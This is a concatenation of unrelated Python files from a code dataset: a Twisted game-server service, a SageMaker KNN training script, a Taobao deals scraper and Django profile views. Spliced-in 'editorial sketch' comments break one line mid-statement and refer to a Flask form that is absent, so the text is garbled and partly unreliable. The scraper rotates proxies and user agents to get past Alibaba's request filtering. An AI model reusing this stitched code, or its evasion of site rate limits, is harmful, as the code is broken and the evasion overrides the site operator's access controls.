services_for_endpoints(endpoints, factory):\n l = []\n for endpoint in endpoints:\n server = serviceForEndpoint(endpoint, factory)\n # XXX hack for bravo.web:135, which wants this. 
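# NOTE (editorial sketch, not part of the scraped file): the Flask app above
# registers separate GET and POST view functions per route and reads raw values
# from request.form. A common alternative is a single view that lets Flask-WTF
# validate the submission; this sketch assumes the stockdataForm class defined
# above and an existing 'stockdata.html' template.
from flask import Flask, render_template

demo = Flask(__name__)
demo.secret_key = 'dev'   # needed for the CSRF token Flask-WTF adds to the form

@demo.route('/stockdata', methods=['GET', 'POST'])
def stockdata_combined():
    form = stockdataForm()
    context = {'form': form}
    if form.validate_on_submit():                # True only for a valid POST
        context['company'] = form.company.data   # cleaned, validated value
        context['start'] = form.start.data       # already parsed to datetime.date
        context['end'] = form.end.data
    return render_template('stockdata.html', **context)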
:c\n server.args = [None, factory]\n server.setName(\"%s (%s)\" % (factory.name, endpoint))\n l.append(server)\n return l\n\nclass BravoService(MultiService):\n\n def __init__(self):\n MultiService.__init__(self)\n\n # Start up our AMP RPC.\n self.amp = TCPServer(25601, ConsoleRPCFactory(self))\n MultiService.addService(self, self.amp)\n self.factorylist = list()\n self.irc = False\n self.ircbots = list()\n self.configure_services(configuration)\n\n def addService(self, service):\n MultiService.addService(self, service)\n\n def removeService(self, service):\n MultiService.removeService(self, service)\n\n def configure_services(self, configuration):\n read_configuration()\n\n for section in configuration.sections():\n if section.startswith(\"world \"):\n # Bravo worlds. Grab a list of endpoints and load them.\n factory = BravoFactory(section[6:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n\n self.factorylist.append(factory)\n elif section == \"web\":\n try:\n from bravo.web import bravo_site\n except ImportError:\n log.msg(\"Couldn't import web stuff!\")\n else:\n factory = bravo_site(self.namedServices)\n factory.name = \"web\"\n interfaces = configuration.getlist(\"web\", \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n elif section.startswith(\"irc \"):\n try:\n from bravo.irc import BravoIRC\n except ImportError:\n log.msg(\"Couldn't import IRC stuff!\")\n else:\n self.irc = True\n self.ircbots.append(section)\n elif section.startswith(\"infiniproxy \"):\n factory = BetaProxyFactory(section[12:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n elif section.startswith(\"infininode \"):\n factory = InfiniNodeFactory(section[11:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n if self.irc:\n for section in self.ircbots:\n factory = BravoIRC(self.factorylist, section[4:])\n client = TCPClient(factory.host, factory.port, factory)\n client.setName(factory.config)\n self.addService(client)\n\nservice = BravoService()\n\napplication = Application(\"Bravo\")\nservice.setServiceParent(application)\n","sub_path":"bravo/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460509882","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom os.path import join\nfrom io import BytesIO\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport logging\nimport pickle\nimport time\nimport json\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\nif 'SAGEMAKER_METRICS_DIRECTORY' in os.environ:\n log_file_handler = logging.FileHandler(join(os.environ['SAGEMAKER_METRICS_DIRECTORY'], \"metrics.json\"))\n log_file_handler.setFormatter(\n \"{'time':'%(asctime)s', 'name': '%(name)s', \\\n 'level': '%(levelname)s', 'message': '%(message)s'}\"\n )\n logger.addHandler(log_file_handler)\n \n \ndef model_fn(model_dir):\n print('[-------------- INSIDE MODEL FN --------------]')\n print(f'MODEL DIR: {model_dir}')\n model = pickle.load(open(os.path.join(model_dir, 'model'), 'rb'))\n return 
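# NOTE (editorial sketch, not part of the scraped file): services_for_endpoints
# above wraps one factory in a named service per endpoint. The same composition
# pattern in isolation looks like this: a MultiService parent with named
# TCPServer children, started and stopped as a unit under twistd. This is plain
# twisted.application usage, not code from the Bravo project.
from twisted.application.internet import TCPServer
from twisted.application.service import MultiService
from twisted.internet.protocol import Factory, Protocol

class Echo(Protocol):
    def dataReceived(self, data):
        self.transport.write(data)   # echo bytes straight back

class EchoFactory(Factory):
    protocol = Echo

parent = MultiService()
for port in (9001, 9002):
    child = TCPServer(port, EchoFactory())
    child.setName("echo-%d" % port)      # name must be set before attaching
    child.setServiceParent(parent)       # registered under parent.namedServices

# parent.startService() binds both listeners when run under twistd.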
model\n\n\ndef input_fn(request_body, request_content_type):\n print('[-------------- INSIDE INPUT FN --------------]')\n print(f'REQUEST BODY: {request_body}')\n print(f'REQUEST CONTENT TYPE: {request_content_type}')\n if request_content_type == 'application/x-npy':\n stream = BytesIO(request_body)\n return np.load(stream)\n else:\n raise ValueError('Content type must be application/x-npy')\n\n\ndef predict_fn(input_data, model):\n print('[-------------- INSIDE PREDICT FN --------------]')\n print(f'INPUT DATA: {input_data}')\n print(f'MODEL: {model}')\n X = input_data.reshape(1, -1)\n prediction = model.predict(X)\n return prediction\n\n\ndef output_fn(prediction, content_type):\n print('[-------------- INSIDE OUTPUT FN --------------]')\n print(f'PREDICTION: {prediction}')\n print(f'CONTENT TYPE: {content_type}')\n if content_type == 'application/x-npy':\n buffer = BytesIO()\n np.save(buffer, prediction)\n return buffer.getvalue()\n else:\n raise ValueError('Accept header must be application/x-npy')\n\n\ndef train():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-data-dir', type=str, default=os.environ.get('SM_OUTPUT_DATA_DIR'))\n parser.add_argument('--model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n parser.add_argument('--test', type=str, default=os.environ.get('SM_CHANNEL_TEST'))\n # hyperparameters\n parser.add_argument('--nneighbors', type=int, default=5)\n args = parser.parse_args()\n \n # ------------------------- YOUR MODEL TRAINING LOGIC STARTS HERE -------------------------\n # Load data from the location specified by args.train (In this case, an S3 bucket)\n print(\"------- [STARTING TRAINING] -------\")\n train_df = pd.read_csv(os.path.join(args.train, 'train.csv'), names=['class', 'mass', 'width', 'height', 'color_score'])\n train_df.head()\n X_train = train_df[['mass', 'width', 'height', 'color_score']]\n y_train = train_df['class']\n knn = KNeighborsClassifier(n_neighbors=args.nneighbors)\n knn.fit(X_train, y_train)\n # Save the trained Model inside the Container\n pickle.dump(knn, open(os.path.join(args.model_dir, 'model'), 'wb'))\n print(\"------- [TRAINING COMPLETE!] -------\")\n \n print(\"------- [STARTING EVALUATION] -------\")\n test_df = pd.read_csv(os.path.join(args.test, 'test.csv'), names=['class', 'mass', 'width', 'height', 'color_score'])\n X_test = test_df[['mass', 'width', 'height', 'color_score']]\n y_test = test_df['class']\n acc = knn.score(X_test, y_test)\n print('Accuracy = {:.4f}%'.format(acc * 100))\n logger.info('Test Accuracy: {:.4f}%'.format(acc * 100))\n print(\"------- [EVALUATION DONE!] -------\")\n\nif __name__ == '__main__':\n train()","sub_path":"SageMaker/Training-Inference/5. 
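# NOTE (editorial sketch, not part of the scraped file): model_fn/input_fn/
# predict_fn/output_fn above form the SageMaker inference contract. They can be
# smoke-tested locally by chaining them by hand; this harness assumes the three
# request handlers above are importable and substitutes a dummy model for the
# pickled KNN.
from io import BytesIO
import numpy as np

class _DummyModel:
    def predict(self, X):
        return np.zeros(len(X))   # always predicts class 0

# Serialize one feature vector the way a numpy (x-npy) serializer would.
buf = BytesIO()
np.save(buf, np.array([150.0, 7.0, 8.0, 0.6]))   # mass, width, height, color_score
request_body = buf.getvalue()

payload = input_fn(request_body, 'application/x-npy')
prediction = predict_fn(payload, _DummyModel())
wire_bytes = output_fn(prediction, 'application/x-npy')
assert float(np.load(BytesIO(wire_bytes))[0]) == 0.0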
BYOS Sklearn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513609621","text":"# coding:utf-8\n\n'''\n@author = super_fazai\n@File : taobao_tiantiantejia.py\n@Time : 2017/12/26 16:02\n@connect : superonesfazai@gmail.com\n'''\n\n\"\"\"\n淘宝天天特价板块抓取清洗入库\n\"\"\"\n\nimport sys\nsys.path.append('..')\n\nimport time\nfrom random import randint\nimport json\nimport requests\nimport re\nfrom pprint import pprint\nfrom decimal import Decimal\nfrom time import sleep\nimport datetime\nimport gc\n\nfrom settings import HEADERS\nfrom settings import PHANTOMJS_DRIVER_PATH, CHROME_DRIVER_PATH, IS_BACKGROUND_RUNNING\nfrom my_pipeline import SqlServerMyPageInfoSaveItemPipeline, SqlPools\nfrom selenium import webdriver\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pytz\n\nfrom taobao_parse import TaoBaoLoginAndParse\n\n# phantomjs驱动地址\nEXECUTABLE_PATH = PHANTOMJS_DRIVER_PATH\n\nclass TaoBaoTianTianTeJia(object):\n def __init__(self):\n self.headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n # 'Accept-Encoding:': 'gzip',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Host': 'metrocity.taobao.com',\n 'User-Agent': HEADERS[randint(0, 34)] # 随机一个请求头\n }\n self.result_data = {}\n self.init_phantomjs()\n\n self.main_sort = {\n '901': '时尚女装',\n '902': '舒适内衣',\n '903': '包包配饰',\n '904': '男鞋女鞋',\n '905': '品质男装',\n '906': '母婴儿童',\n '907': '日用百货',\n '908': '美食特产',\n '909': '数码家电',\n '910': '美容护肤',\n '911': '运动户外',\n }\n\n def get_all_goods_list(self):\n '''\n 模拟构造得到天天特价的所有商品的list, 并且解析存入每个\n :return: sort_data 类型list\n '''\n # * 获取分类的name和extQuery的tagId的地址为 *(开始为在blockId=901开始)\n # https://metrocity.taobao.com/json/fantomasTags.htm?_input_charset=utf-8&appId=9&blockId=901\n sort_data = []\n for block_id in range(901, 914, 1):\n sort_url = 'https://metrocity.taobao.com/json/fantomasTags.htm?_input_charset=utf-8&appId=9&blockId=' + str(block_id)\n print(sort_url)\n sort_body = self.use_phantomjs_to_get_url_body(url=sort_url)\n # print(sort_body)\n\n if sort_body != '':\n tmp_sort_data = self.get_sort_data_list(body=sort_body)\n # print(tmp_sort_data)\n if str(block_id) in self.main_sort:\n sort_name = self.main_sort[str(block_id)]\n # print(sort_name)\n tmp = {\n block_id: sort_name,\n 'data': tmp_sort_data,\n }\n sort_data.append(tmp)\n sleep(.5)\n pprint(sort_data)\n\n try:\n self.driver.quit()\n except:\n pass\n gc.collect()\n\n return sort_data\n\n def deal_with_all_goods_id(self, sort_data):\n '''\n 获取每个详细分类的商品信息\n :param sort_data: 所有分类的商品信息(包括商品id跟特价开始时间跟结束时间)\n :return: None\n '''\n my_pipeline = SqlServerMyPageInfoSaveItemPipeline()\n # my_pipeline = SqlPools()\n index = 1\n if my_pipeline.is_connect_success:\n # 普通sql_server连接(超过3000无返回结果集)\n db_goods_id_list = [item[0] for item in list(my_pipeline.select_taobao_tiantian_tejia_all_goods_id())]\n print(db_goods_id_list)\n\n for item in sort_data:\n for key in item.keys():\n if isinstance(key, int): # 当key值类型为int时, 表示为详细分类的blockID的值\n tmp_data = item.get('data', [])\n for item_2 in tmp_data:\n # &extQuery=tagId%3A1010142 要post的数据, 此处直接用get模拟\n tmp_url = 
'https://metrocity.taobao.com/json/fantomasItems.htm?appId=9&pageSize=1000&_input_charset=utf-8&blockId={0}&extQuery=tagId%3A{1}'.format(\n str(key), item_2.get('extQuery', '')[6:]\n )\n\n tmp_body = self.get_url_body(url=tmp_url)\n tejia_goods_list = self.get_tiantiantejia_goods_list(body=tmp_body)\n print(tejia_goods_list)\n\n for tmp_item in tejia_goods_list:\n if tmp_item.get('goods_id', '') in db_goods_id_list:\n print('该goods_id已经存在于数据库中, 此处跳过')\n pass\n\n else:\n if index % 50 == 0: # 每50次重连一次,避免单次长连无响应报错\n print('正在重置,并与数据库建立新连接中...')\n # try:\n # del my_pipeline\n # except:\n # pass\n # gc.collect()\n my_pipeline = SqlServerMyPageInfoSaveItemPipeline()\n # my_pipeline = SqlPools()\n print('与数据库的新连接成功建立...')\n\n if my_pipeline.is_connect_success:\n tmp_url = 'https://item.taobao.com/item.htm?id=' + str(tmp_item.get('goods_id', ''))\n taobao = TaoBaoLoginAndParse()\n goods_id = taobao.get_goods_id_from_url(tmp_url)\n taobao.get_goods_data(goods_id=goods_id)\n goods_data = taobao.deal_with_data(goods_id=goods_id)\n\n if goods_data != {}:\n goods_data['goods_id'] = tmp_item.get('goods_id', '')\n goods_data['goods_url'] = tmp_url\n goods_data['schedule'] = [{\n 'begin_time': tmp_item.get('start_time', ''),\n 'end_time': tmp_item.get('end_time', ''),\n }]\n goods_data['tejia_begin_time'], goods_data['tejia_end_time'] = self.get_tejia_begin_time_and_tejia_end_time(schedule=goods_data.get('schedule', [])[0])\n goods_data['block_id'] = str(key)\n goods_data['tag_id'] = item_2.get('extQuery', '')[6:]\n goods_data['father_sort'] = self.main_sort[str(key)]\n goods_data['child_sort'] = item_2.get('name', '')\n # print(goods_data)\n\n taobao.insert_into_taobao_tiantiantejia_table(data=goods_data, pipeline=my_pipeline)\n else:\n pass\n sleep(1.6)\n index += 1\n else:\n print('数据库连接失败!')\n pass\n else:\n pass\n\n else:\n print('数据库连接失败!')\n pass\n gc.collect()\n\n def get_url_body(self, url):\n '''\n 获取url的body\n :param url: 待抓取的地址url\n :return: str\n '''\n # 设置代理ip\n self.proxies = self.get_proxy_ip_from_ip_pool() # {'http': ['xx', 'yy', ...]}\n self.proxy = self.proxies['http'][randint(0, len(self.proxies) - 1)]\n\n tmp_proxies = {\n 'http': self.proxy,\n }\n # print('------>>>| 正在使用代理ip: {} 进行爬取... 
|<<<------'.format(self.proxy))\n\n # 更改Host\n tmp_headers = self.headers\n tmp_host = re.compile(r'https://(.*?)/.*').findall(url)[0]\n tmp_headers['Host'] = tmp_host\n try:\n response = requests.get(url, headers=tmp_headers, proxies=tmp_proxies, timeout=16)\n body = response.content.decode('utf-8')\n # print(body)\n body = re.compile(r'\\n').sub('', body)\n body = re.compile(r'\\t').sub('', body)\n body = re.compile(r' ').sub('', body)\n # print(body)\n\n body = re.compile(r'\\((.*)\\)').findall(body)[0]\n except:\n print('requests.get()请求超时....')\n print('data为空!')\n self.result_data = {} # 重置下,避免存入时影响下面爬取的赋值\n body = '{}'\n\n return body\n\n def get_tejia_begin_time_and_tejia_end_time(self, schedule):\n '''\n 返回拼团开始和结束时间\n :param miaosha_time:\n :return: tuple tejia_begin_time, tejia_end_time\n '''\n tejia_begin_time = schedule.get('begin_time')\n tejia_end_time = schedule.get('end_time')\n # 将字符串转换为datetime类型\n tejia_begin_time = datetime.datetime.strptime(tejia_begin_time, '%Y-%m-%d %H:%M:%S')\n tejia_end_time = datetime.datetime.strptime(tejia_end_time, '%Y-%m-%d %H:%M:%S')\n\n return tejia_begin_time, tejia_end_time\n\n def use_phantomjs_to_get_url_body(self, url):\n '''\n 通过phantomjs来获取url的body\n :return: data str类型\n '''\n self.from_ip_pool_set_proxy_ip_to_phantomjs()\n try:\n self.driver.set_page_load_timeout(15) # 设置成10秒避免数据出错\n except:\n return {}\n\n try:\n self.driver.get(url)\n self.driver.implicitly_wait(20) # 隐式等待和显式等待可以同时使用\n\n main_body = self.driver.page_source\n main_body = re.compile(r'\\n').sub('', main_body)\n main_body = re.compile(r'\\t').sub('', main_body)\n main_body = re.compile(r' ').sub('', main_body)\n # print(main_body)\n data = re.compile(r'\\((.*)\\)').findall(main_body)[0] # 贪婪匹配匹配所有\n # print(data)\n except Exception as e: # 如果超时, 终止加载并继续后续操作\n print('-->>time out after 15 seconds when loading page')\n print('报错如下: ', e)\n # self.driver.execute_script('window.stop()') # 当页面加载时间超过设定时间,通过执行Javascript来stop加载,即可执行后续动作\n print('data为空!')\n self.result_data = {} # 重置下,避免存入时影响下面爬取的赋值\n data = ''\n\n return data\n\n def get_sort_data_list(self, body):\n '''\n 获取到分类的list(对应name和extQuery的值的list)\n :param body: 待转换的json\n :return: sort_data 类型 list\n '''\n try:\n sort_data = json.loads(body)\n except Exception:\n print('在获取分类信息的list时, json.loads转换出错, 此处跳过!')\n sort_data = {}\n\n try:\n sort_data = sort_data.get('data', [])\n except:\n print('获取分类信息data中的key值data出错!')\n sort_data = []\n\n return sort_data\n\n def get_tiantiantejia_goods_list(self, body):\n '''\n 将str类型的body转换为需求的list\n :param body:\n :return: a list\n '''\n try:\n data = json.loads(body)\n except Exception:\n print('在获取天天特价商品id的list时, json.loads转换出错, 此处跳过!')\n data = {}\n\n try:\n data = data.get('data', [])\n except Exception:\n print('获取data中的key值data出错!')\n data = []\n\n if data != []:\n # 处理得到需要的数据\n tejia_goods_list = [{\n 'goods_id': item.get('itemId', ''),\n 'start_time': self.deal_with_time_to_regulartime(item.get('activityStartTime', '')),\n 'end_time': self.deal_with_time_to_regulartime(item.get('activityEndTime', '')),\n } for item in data]\n else:\n tejia_goods_list = []\n\n return tejia_goods_list\n\n def deal_with_time_to_regulartime(self, tmp_time):\n '''\n 处理得到规范的时间\n :param tmp_time: str eg: '20171225000000'\n :return: str 规律的人眼可识别的时间 2609-03-15 14:03:20\n '''\n return tmp_time[0:4] + '-' + tmp_time[4:6] + '-' + tmp_time[6:8] + ' ' + tmp_time[8:10] + ':' + tmp_time[10:12] + ':' + tmp_time[12:14]\n\n def init_phantomjs(self):\n \"\"\"\n 
初始化带cookie的驱动,之所以用phantomjs是因为其加载速度很快(快过chrome驱动太多)\n \"\"\"\n '''\n 研究发现, 必须以浏览器的形式进行访问才能返回需要的东西\n 常规requests模拟请求会被阿里服务器过滤, 并返回请求过于频繁的无用页面\n '''\n print('--->>>初始化phantomjs驱动中<<<---')\n cap = webdriver.DesiredCapabilities.PHANTOMJS\n cap['phantomjs.page.settings.resourceTimeout'] = 1000 # 1秒\n cap['phantomjs.page.settings.loadImages'] = False\n cap['phantomjs.page.settings.disk-cache'] = True\n cap['phantomjs.page.settings.userAgent'] = HEADERS[randint(0, 34)] # 随机一个请求头\n # cap['phantomjs.page.customHeaders.Cookie'] = cookies\n tmp_execute_path = EXECUTABLE_PATH\n\n self.driver = webdriver.PhantomJS(executable_path=tmp_execute_path, desired_capabilities=cap)\n\n wait = ui.WebDriverWait(self.driver, 20) # 显示等待n秒, 每过0.5检查一次页面是否加载完毕\n print('------->>>初始化完毕<<<-------')\n\n def from_ip_pool_set_proxy_ip_to_phantomjs(self):\n ip_list = self.get_proxy_ip_from_ip_pool().get('http')\n proxy_ip = ''\n try:\n proxy_ip = ip_list[randint(0, len(ip_list) - 1)] # 随机一个代理ip\n except Exception:\n print('从ip池获取随机ip失败...正在使用本机ip进行爬取!')\n # print('------>>>| 正在使用的代理ip: {} 进行爬取... |<<<------'.format(proxy_ip))\n proxy_ip = re.compile(r'http://').sub('', proxy_ip) # 过滤'http://'\n proxy_ip = proxy_ip.split(':') # 切割成['xxxx', '端口']\n\n try:\n tmp_js = {\n 'script': 'phantom.setProxy({}, {});'.format(proxy_ip[0], proxy_ip[1]),\n 'args': []\n }\n self.driver.command_executor._commands['executePhantomScript'] = ('POST', '/session/$sessionId/phantom/execute')\n self.driver.execute('executePhantomScript', tmp_js)\n except Exception:\n print('动态切换ip失败')\n pass\n\n def get_proxy_ip_from_ip_pool(self):\n '''\n 从代理ip池中获取到对应ip\n :return: dict类型 {'http': ['http://183.136.218.253:80', ...]}\n '''\n base_url = 'http://127.0.0.1:8000'\n result = requests.get(base_url).json()\n\n result_ip_list = {}\n result_ip_list['http'] = []\n for item in result:\n if item[2] > 7:\n tmp_url = 'http://' + str(item[0]) + ':' + str(item[1])\n result_ip_list['http'].append(tmp_url)\n else:\n delete_url = 'http://127.0.0.1:8000/delete?ip='\n delete_info = requests.get(delete_url + item[0])\n # pprint(result_ip_list)\n return result_ip_list\n\n def __del__(self):\n # self.driver.quit()\n gc.collect()\n\ndef daemon_init(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):\n '''\n 杀掉父进程,独立子进程\n :param stdin:\n :param stdout:\n :param stderr:\n :return:\n '''\n sys.stdin = open(stdin, 'r')\n sys.stdout = open(stdout, 'a+')\n sys.stderr = open(stderr, 'a+')\n try:\n pid = os.fork()\n if pid > 0: # 父进程\n os._exit(0)\n except OSError as e:\n sys.stderr.write(\"first fork failed!!\" + e.strerror)\n os._exit(1)\n\n # 子进程, 由于父进程已经退出,所以子进程变为孤儿进程,由init收养\n '''setsid使子进程成为新的会话首进程,和进程组的组长,与原来的进程组、控制终端和登录会话脱离。'''\n os.setsid()\n '''防止在类似于临时挂载的文件系统下运行,例如/mnt文件夹下,这样守护进程一旦运行,临时挂载的文件系统就无法卸载了,这里我们推荐把当前工作目录切换到根目录下'''\n os.chdir(\"/\")\n '''设置用户创建文件的默认权限,设置的是权限“补码”,这里将文件权限掩码设为0,使得用户创建的文件具有最大的权限。否则,默认权限是从父进程继承得来的'''\n os.umask(0)\n\n try:\n pid = os.fork() # 第二次进行fork,为了防止会话首进程意外获得控制终端\n if pid > 0:\n os._exit(0) # 父进程退出\n except OSError as e:\n sys.stderr.write(\"second fork failed!!\" + e.strerror)\n os._exit(1)\n\n # 孙进程\n # for i in range(3, 64): # 关闭所有可能打开的不需要的文件,UNP中这样处理,但是发现在python中实现不需要。\n # os.close(i)\n sys.stdout.write(\"Daemon has been created! 
with pid: %d\\n\" % os.getpid())\n sys.stdout.flush() # 由于这里我们使用的是标准IO,这里应该是行缓冲或全缓冲,因此要调用flush,从内存中刷入日志文件。\n\ndef just_fuck_run():\n while True:\n print('一次大抓取即将开始'.center(30, '-'))\n taobao_tiantaintejia = TaoBaoTianTianTeJia()\n sort_data = taobao_tiantaintejia.get_all_goods_list()\n taobao_tiantaintejia.deal_with_all_goods_id(sort_data=sort_data)\n # try:\n # del taobao_tiantaintejia\n # except:\n # pass\n gc.collect()\n print('一次大抓取完毕, 即将重新开始'.center(30, '-'))\n sleep(60*5)\n\ndef main():\n '''\n 这里的思想是将其转换为孤儿进程,然后在后台运行\n :return:\n '''\n print('========主函数开始========') # 在调用daemon_init函数前是可以使用print到标准输出的,调用之后就要用把提示信息通过stdout发送到日志系统中了\n daemon_init() # 调用之后,你的程序已经成为了一个守护进程,可以执行自己的程序入口了\n print('--->>>| 孤儿进程成功被init回收成为单独进程!')\n # time.sleep(10) # daemon化自己的程序之后,sleep 10秒,模拟阻塞\n just_fuck_run()\n\n\nif __name__ == '__main__':\n if IS_BACKGROUND_RUNNING:\n main()\n else:\n just_fuck_run()","sub_path":"python网络数据采集/my_爬虫_进阶_之路/scrapy框架/my_spiders/电商项目集合/阿里1688_淘宝_天猫_京东_折800_卷皮_拼多多/my_flask_server/tejia/taobao_tiantiantejia.py","file_name":"taobao_tiantiantejia.py","file_ext":"py","file_size_in_byte":19717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407875007","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .forms import LoginForm, SignupForm\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http.response import HttpResponseRedirect\nfrom .models import Student\n# Create your views here.\ndef home(request):\n return render(request, 'app/home.html')\n\ndef user_login(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n fm = LoginForm(request=request, data=request.POST)\n if fm.is_valid():\n uname = fm.cleaned_data['username']\n upass = fm.cleaned_data['password']\n user = authenticate(username=uname,password=upass)\n if user is not None:\n login(request, user)\n messages.success(request, 'Logged In Successfully!!!')\n return HttpResponseRedirect('/dashboard/')\n else:\n fm = LoginForm()\n return render(request, 'app/login.html', {'form':fm})\n else:\n return HttpResponseRedirect('/dashboard/')\n\ndef user_signup(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n fm = SignupForm(request.POST)\n if fm.is_valid():\n messages.success(request,'Registered Successfully!!!')\n fm.save()\n fm = SignupForm()\n return HttpResponseRedirect('/login/')\n else:\n fm = SignupForm()\n return render(request, 'app/signup.html',{'form':fm})\n else:\n return HttpResponseRedirect('/dashboard/')\n\ndef user_logout(request):\n if request.user.is_authenticated:\n logout(request)\n messages.success(request, 'Logged Out Successfully!!!')\n return HttpResponseRedirect('/')\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef preview(request):\n if request.user.is_authenticated:\n details = Student.objects.filter(user=request.user)\n if(details):\n data = details[0]\n else:\n data = {}\n return render(request, 'app/preview.html',{'data':data})\n else:\n return HttpResponseRedirect('/login/')\n\ndef dashboard(request):\n if request.user.is_authenticated:\n if request.method == \"POST\":\n student_details = Student.objects.filter(user=request.user)\n if(student_details):\n student_details = student_details[0]\n student_details.email = request.POST.get('email')\n student_details.fullname = request.POST.get('fullname')\n student_details.dob = request.POST.get('dob')\n student_details.adress = 
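# NOTE (editorial sketch, not part of the scraped file): deal_with_time_to_regulartime
# in the crawler above rebuilds a compact timestamp like '20171225000000' with string
# slices. An equivalent approach is to round-trip through datetime, which also rejects
# malformed input instead of silently producing garbage:
from datetime import datetime

def compact_to_regular(tmp_time):
    """'20171225000000' -> '2017-12-25 00:00:00'; raises ValueError if malformed."""
    return datetime.strptime(tmp_time, '%Y%m%d%H%M%S').strftime('%Y-%m-%d %H:%M:%S')

assert compact_to_regular('20171225000000') == '2017-12-25 00:00:00'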
request.POST.get('adress')\n student_details.clgname = request.POST.get('clgname')\n student_details.clgyear = request.POST.get('clgyear')\n student_details.clgyear = request.POST.get('clgyear')\n student_details.clgcpi = request.POST.get('clgcpi')\n student_details.cls12name = request.POST.get('cls12name')\n student_details.cls12year = request.POST.get('cls12year')\n student_details.cls12cpi = request.POST.get('cls12cpi')\n student_details.cls10name = request.POST.get('cls10name')\n student_details.cls10year = request.POST.get('cls10year')\n student_details.cls10cpi = request.POST.get('cls10cpi')\n student_details.intrest = request.POST.get('intrest')\n student_details.planguages = request.POST.get('planguages')\n student_details.toolsandtech = request.POST.get('toolsandtech')\n student_details.projectname = request.POST.get('projectname')\n student_details.projectguide = request.POST.get('projectguide')\n student_details.projectdesc = request.POST.get('projectdesc')\n student_details.hobby1 = request.POST.get('hobby1')\n student_details.hobby2 = request.POST.get('hobby2')\n student_details.hobby3 = request.POST.get('hobby3')\n student_details.hobby4 = request.POST.get('hobby4')\n student_details.save()\n else:\n fullname = request.POST.get('fullname')\n email = request.POST.get('email')\n dob = request.POST.get('dob')\n adress = request.POST.get('adress')\n clgname = request.POST.get('clgname')\n clgyear = request.POST.get('clgyear')\n clgyear = request.POST.get('clgyear')\n clgcpi = request.POST.get('clgcpi')\n cls12name = request.POST.get('cls12name')\n cls12year = request.POST.get('cls12year')\n cls12cpi = request.POST.get('cls12cpi')\n cls10name = request.POST.get('cls10name')\n cls10year = request.POST.get('cls10year')\n cls10cpi = request.POST.get('cls10cpi')\n intrest = request.POST.get('intrest')\n planguages = request.POST.get('planguages')\n toolsandtech = request.POST.get('toolsandtech')\n projectname = request.POST.get('projectname')\n projectguide = request.POST.get('projectguide')\n projectdesc = request.POST.get('projectdesc')\n hobby1 = request.POST.get('hobby1')\n hobby2 = request.POST.get('hobby2')\n hobby3 = request.POST.get('hobby3')\n hobby4 = request.POST.get('hobby4')\n \n data = Student(user=request.user,fullname=fullname,email=email, dob=dob, adress=adress, clgname=clgname, clgyear=clgyear, clgcpi=clgcpi, cls12name=cls12name, cls12year=cls12year, cls12cpi=cls12cpi, cls10name=cls10name, cls10year=cls10year, cls10cpi=cls10cpi, intrest=intrest, planguages=planguages, toolsandtech=toolsandtech, projectname=projectname, projectguide=projectguide, projectdesc=projectdesc, hobby1=hobby1, hobby2=hobby2, hobby3=hobby3,hobby4=hobby4)\n\n data.save()\n messages.success(request, 'Saved Successfully!!!')\n return HttpResponseRedirect('/preview/')\n \n details = Student.objects.filter(user=request.user)\n if(details):\n data = details[0]\n else:\n data={}\n return render(request, 'app/dashboard.html',{'data':data})\n else:\n return HttpResponseRedirect('/login/')","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599863849","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils import timezone\nfrom datetime import datetime\n\nfrom PIL import Image, ImageOps\n\nIMAGE_THUMBNAIL_SIZE = (300, 300)\nSTAFF_THUMBNAIL_SIZE = (300, 300)\n\nCONTACTS = 'contacts'\nSTATE = 'ld_state'\nREGISTRATION = 'registr'\nRESULTS = 
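# NOTE (editorial sketch, not part of the scraped file): the dashboard view above
# assigns every POSTed field twice, once in the update branch and once in the
# create branch. Django's update_or_create collapses both paths; the field list
# here is abbreviated, so this is an illustration rather than the app's exact code.
def save_student_details(request):
    fields = ['fullname', 'email', 'dob', 'adress', 'clgname', 'clgyear', 'clgcpi']
    defaults = {name: request.POST.get(name) for name in fields}
    student, created = Student.objects.update_or_create(
        user=request.user,    # lookup key: one Student row per user
        defaults=defaults,    # values written on both create and update
    )
    return student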
